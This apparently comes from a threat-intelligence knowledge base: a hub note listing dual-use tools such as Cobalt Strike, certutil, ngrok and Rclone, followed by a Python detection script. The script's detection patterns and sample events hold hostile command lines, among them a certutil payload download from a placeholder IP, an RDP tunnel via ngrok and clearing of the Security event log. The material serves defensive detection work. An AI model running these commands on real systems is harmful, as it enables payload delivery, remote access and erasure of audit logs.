# Tools - Dual-Use Software

> Legitimate tools frequently abused by threat actors in real campaigns. Organized into four functional categories aligned with MITRE ATT&CK: C2 frameworks, credential tools, reconnaissance tools and exploitation frameworks. The remaining operational support tools (tunneling, defense evasion, LOLBAS) live in this root folder.

```mermaid
graph TB
    TOOLS["🔧 Tools Hub<br/>Dual-Use Software"]

    subgraph C2["📡 C2 Frameworks"]
        C2A["Cobalt Strike<br/>Sliver, Mythic"]
        C2B["Empire, PoshC2<br/>Covenant, Pupy"]
    end

    subgraph CRED["🔑 Credential Tools"]
        CR1["Mimikatz<br/>Rubeus, LaZagne"]
        CR2["gsecdump, pwdump<br/>fgdump, cachedump"]
    end

    subgraph RECON["🔍 Recon Tools"]
        RE1["BloodHound<br/>AdFind, dsquery"]
        RE2["AADInternals<br/>ROADTools, Pacu"]
    end

    subgraph EXP["💥 Exploitation"]
        EX1["Impacket<br/>Metasploit, Responder"]
        EX2["PowerSploit<br/>CrackMapExec, sqlmap"]
    end

    subgraph OPS["🛠️ Operational"]
        OP1["Tunneling<br/>ngrok, FRP, HTRAN, Tor"]
        OP2["LOLBAS<br/>certutil, bitsadmin, cmd"]
        OP3["Remote Access<br/>PsExec, ConnectWise"]
    end

    TOOLS --> C2
    TOOLS --> CRED
    TOOLS --> RECON
    TOOLS --> EXP
    TOOLS --> OPS

    style TOOLS fill:#1abc9c,color:#fff
    style C2 fill:#1a1a2e,color:#fff
    style CRED fill:#1a1a2e,color:#fff
    style RECON fill:#1a1a2e,color:#fff
    style EXP fill:#1a1a2e,color:#fff
    style OPS fill:#1a1a2e,color:#fff
    style C2A fill:#3498db,color:#fff
    style C2B fill:#2980b9,color:#fff
    style CR1 fill:#e74c3c,color:#fff
    style CR2 fill:#c0392b,color:#fff
    style RE1 fill:#9b59b6,color:#fff
    style RE2 fill:#8e44ad,color:#fff
    style EX1 fill:#e67e22,color:#fff
    style EX2 fill:#d35400,color:#fff
    style OP1 fill:#27ae60,color:#fff
    style OP2 fill:#1e8449,color:#fff
    style OP3 fill:#145a32,color:#fff
```

> [!warning] Dual-Use
> These tools are legitimate software with valid defensive uses. Their inclusion here documents their **abuse by threat actors**, not a classification as malware.

The split follows MITRE ATT&CK's software typing: notes in this folder carry the field `malware-type: tool` or `malware-type: toolkit`.

## Subcategories

| Subcategory | Description | Examples |
| ----------- | ----------- | -------- |
| [[_c2-frameworks\|C2 Frameworks]] | Command & Control frameworks | Cobalt Strike, Sliver, Mythic, Empire |
| [[_credential-tools\|Credential Tools]] | Credential access and theft | Mimikatz, Rubeus, LaZagne, gsecdump |
| [[_recon-tools\|Recon Tools]] | Reconnaissance and enumeration | BloodHound, AdFind, AADInternals |
| [[_exploitation\|Exploitation]] | Exploitation frameworks | Impacket, Metasploit, Responder, sqlmap |

## Operational Tools (root)

Operational support tools that do not fit a single category: tunneling, defense evasion, LOLBAS and legitimate remote access.

%%
```dataview
TABLE WITHOUT ID link(file.link, title) AS "Name", malware-type AS "Type", aliases AS "Aliases", status AS "Status"
FROM "cti/software/tools"
WHERE (type = "malware" OR type = "tool") AND file.folder = "cti/software/tools"
SORT title ASC
```
%%

| Name | Type | Aliases | Status |
| ---- | ---- | ------- | ------ |
| [[s0110-at\|at]] | tool | at, at.exe | active |
| [[s1176-attrib\|attrib]] | tool | attrib, attrib.exe | active |
| [[s0190-bitsadmin\|BITSAdmin]] | tool | BITSAdmin | active |
| [[s1063-brute-ratel-c4\|Brute Ratel C4]] | tool | Brute Ratel C4, Brute Ratel, BRc4, Dark Vortex | active |
| [[s0160-certutil\|certutil]] | tool | certutil, certutil.exe | active |
| [[s1205-cipherexe\|cipher.exe]] | tool | cipher.exe | active |
| [[s0106-cmd\|cmd]] | tool | cmd, cmd.exe | active |
| [[cobalt-strike\|Cobalt Strike]] | \- | Cobalt Strike | \- |
| [[s0591-connectwise\|ConnectWise]] | tool | ConnectWise, ScreenConnect | active |
| [[s0527-cspy-downloader\|CSPY Downloader]] | tool | CSPY Downloader | active |
| [[empire\|Empire]] | \- | Empire | \- |
| [[s0404-esentutl\|esentutl]] | tool | esentutl, esentutl.exe | active |
| [[s0361-expand\|Expand]] | tool | Expand | active |
| [[s0193-forfiles\|Forfiles]] | tool | Forfiles | active |
| [[cti/software/tools/s1144-frp.md\|FRP]] | tool | FRP | active |
| [[s0095-ftp\|ftp]] | tool | ftp, ftp.exe | active |
| [[s0040-htran\|HTRAN]] | tool | HTRAN, HUC Packet Transmit Tool | active |
| [[cti/software/tools/s0434-imminent-monitor.md\|Imminent Monitor]] | tool | Imminent Monitor, IM-RAT | active |
| [[s0581-ironnetinjector\|IronNetInjector]] | tool | IronNetInjector, IronNetInjector toolchain | active |
| [[cti/software/tools/langflow.md\|Langflow]] | \- | Langflow, LangFlow | active |
| [[s0500-mcmd\|MCMD]] | tool | MCMD | active |
| [[s0175-meek\|meek]] | tool | meek, meek-client, meek-server | active |
| [[s0108-netsh\|netsh]] | tool | netsh, netsh.exe | active |
| [[s0508-ngrok\|ngrok]] | tool | ngrok | active |
| [[s0594-out1\|Out1]] | tool | Out1 | active |
| [[cti/software/tools/psexec.md\|PsExec]] | tool | PsExec, psexec.exe, Sysinternals PsExec | active |
| [[s1209-quick-assist\|Quick Assist]] | tool | Quick Assist | active |
| [[s0364-rawdisk\|RawDisk]] | tool | RawDisk | active |
| [[s1040-rclone\|Rclone]] | tool | Rclone | active |
| [[s0075-reg\|Reg]] | tool | Reg, reg.exe | active |
| [[s0592-remoteutilities\|RemoteUtilities]] | tool | RemoteUtilities | active |
| [[s0053-cobalt-strike\|S0053 Cobalt Strike]] | \- | S0053 Cobalt Strike | \- |
| [[s0111-schtasks\|schtasks]] | tool | schtasks, schtasks.exe, Windows Task Scheduler | active |
| [[s0195-sdelete\|SDelete]] | tool | SDelete, sdelete.exe, sdelete64.exe | active |
| [[sliver\|Sliver]] | \- | Sliver | \- |
| [[s0183-tor\|Tor]] | tool | Tor, The Onion Router, Tor Browser | active |
| [[tycoon-2fa\|Tycoon 2FA]] | phishing-kit | Tycoon 2FA, Tycoon2FA, Tycoon-2FA | active |
| [[s0645-wevtutil\|Wevtutil]] | tool | Wevtutil, wevtutil.exe, Windows Events Command Line Utility | active |
| [[s0191-winexe\|Winexe]] | tool | Winexe, winexe | active |
| [[s0123-xcmd\|xCmd]] | tool | xCmd, xcmd | active |

## Navigation

- [[_software|Software Hub]] - overview of malware + tools
- [[_cti|CTI Hub]] - central intelligence hub
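The dual-use point above (a listed tool is a lead, not a verdict) is easiest to see when the inventory is actually used for detection. The following Python script is an added example, not part of this note or of any referenced tool: it indexes a constructed subset of the aliases from the table by executable name, scans constructed Sysmon-style process-creation events, escalates hits whose command line carries a documented abuse pattern (e.g. `certutil -urlcache`, `wevtutil cl`), and suppresses hits from a known-good host/user context. The event field names, the `SUSPICIOUS_ARGS` heuristics, the allowlist and the sample events are all assumptions.

```python
"""Match process-creation events against a dual-use tool inventory.

Added example, not part of the original note. The inventory is a constructed
subset of the hub table; event fields (Image, CommandLine, User, Host), the
argument heuristics, the allowlist and the sample events are assumptions.
"""
from dataclasses import dataclass, field

# Constructed subset of the hub table: tool name -> aliases (executable names).
DUAL_USE_TOOLS = {
    "certutil": ["certutil", "certutil.exe"],
    "BITSAdmin": ["BITSAdmin"],
    "ngrok": ["ngrok"],
    "Rclone": ["Rclone"],
    "PsExec": ["PsExec", "psexec.exe"],
    "SDelete": ["SDelete", "sdelete.exe", "sdelete64.exe"],
    "Wevtutil": ["Wevtutil", "wevtutil.exe"],
    "schtasks": ["schtasks", "schtasks.exe"],
}

# Command-line fragments that make a hit worth escalating. Assumed heuristics
# drawn from well-known abuse patterns; matched as case-insensitive substrings
# of the command line padded with spaces, so " cl " matches a bare argument.
SUSPICIOUS_ARGS = {
    "certutil": ["-urlcache", "-decode"],
    "BITSAdmin": ["/transfer"],
    "Wevtutil": [" cl "],
    "Rclone": [" copy ", " sync "],
    "schtasks": ["/create"],
}

# Known-good contexts (tool, host, user) where the tool is expected, e.g. an
# admin jump host. Constructed; in practice this comes from the asset inventory.
ALLOWLIST = {("psexec", "adm-jump01", "CORP\\svc-deploy")}


@dataclass
class Hit:
    tool: str
    host: str
    user: str
    reasons: list = field(default_factory=list)
    suppressed: bool = False


def build_alias_index(tools):
    """Map each alias, lowercased, both with and without .exe, to its tool name."""
    index = {}
    for tool, aliases in tools.items():
        for alias in aliases:
            stem = alias.lower()
            if stem.endswith(".exe"):
                stem = stem[:-4]
            index[stem] = tool
            index[stem + ".exe"] = tool
    return index


ALIAS_INDEX = build_alias_index(DUAL_USE_TOOLS)


def image_basename(image):
    """Lowercased basename of a Windows or POSIX path."""
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def flag_dual_use(event):
    """Return a Hit if the event's image is a listed dual-use tool, else None.

    A bare alias match is recorded but may be suppressed by the allowlist;
    a match with a suspicious argument is never suppressed.
    """
    tool = ALIAS_INDEX.get(image_basename(event["Image"]))
    if tool is None:
        return None
    hit = Hit(tool=tool, host=event["Host"], user=event["User"])
    cmd = " " + event.get("CommandLine", "").lower() + " "
    for frag in SUSPICIOUS_ARGS.get(tool, []):
        if frag.lower() in cmd:
            hit.reasons.append(f"command line contains {frag.strip()!r}")
    if not hit.reasons and (tool.lower(), hit.host, hit.user) in ALLOWLIST:
        hit.suppressed = True
    return hit


def triage(events):
    """Return non-suppressed hits, escalated (with reasons) first, then by tool name."""
    hits = [h for e in events if (h := flag_dual_use(e)) and not h.suppressed]
    return sorted(hits, key=lambda h: (not h.reasons, h.tool.lower()))


# Constructed sample events with Sysmon-style field names; not real telemetry.
SAMPLE_EVENTS = [
    {"Host": "ws-0142", "User": "CORP\\jdoe",
     "Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.5/a.txt a.txt"},
    {"Host": "ws-0142", "User": "CORP\\jdoe",
     "Image": "C:\\Users\\jdoe\\Downloads\\ngrok.exe", "CommandLine": "ngrok tcp 3389"},
    {"Host": "adm-jump01", "User": "CORP\\svc-deploy",
     "Image": "C:\\Tools\\PsExec.exe", "CommandLine": "PsExec.exe \\\\srv-01 -s cmd"},
    {"Host": "ws-0142", "User": "CORP\\jdoe",
     "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe notes.txt"},
    {"Host": "dc-01", "User": "CORP\\jdoe",
     "Image": "C:\\Windows\\System32\\wevtutil.exe", "CommandLine": "wevtutil.exe cl Security"},
]

if __name__ == "__main__":
    for h in triage(SAMPLE_EVENTS):
        why = "; ".join(h.reasons) or "dual-use tool seen, no escalation indicator"
        print(f"{h.host} {h.user}: {h.tool} -> {why}")
```

On the sample input the certutil download and the `wevtutil cl Security` log clear come out first, the ngrok execution on a workstation is kept as a plain dual-use sighting for analyst review, and PsExec from the deployment account on the jump host is suppressed. Keep the alias index generated from the notes' `aliases` field rather than hand-maintained, and treat the suppression list as a reviewed artifact: the same allowlist entry that silences routine PsExec use would also silence an attacker who has taken over that account on that host, which is why argument-based escalation is never suppressed.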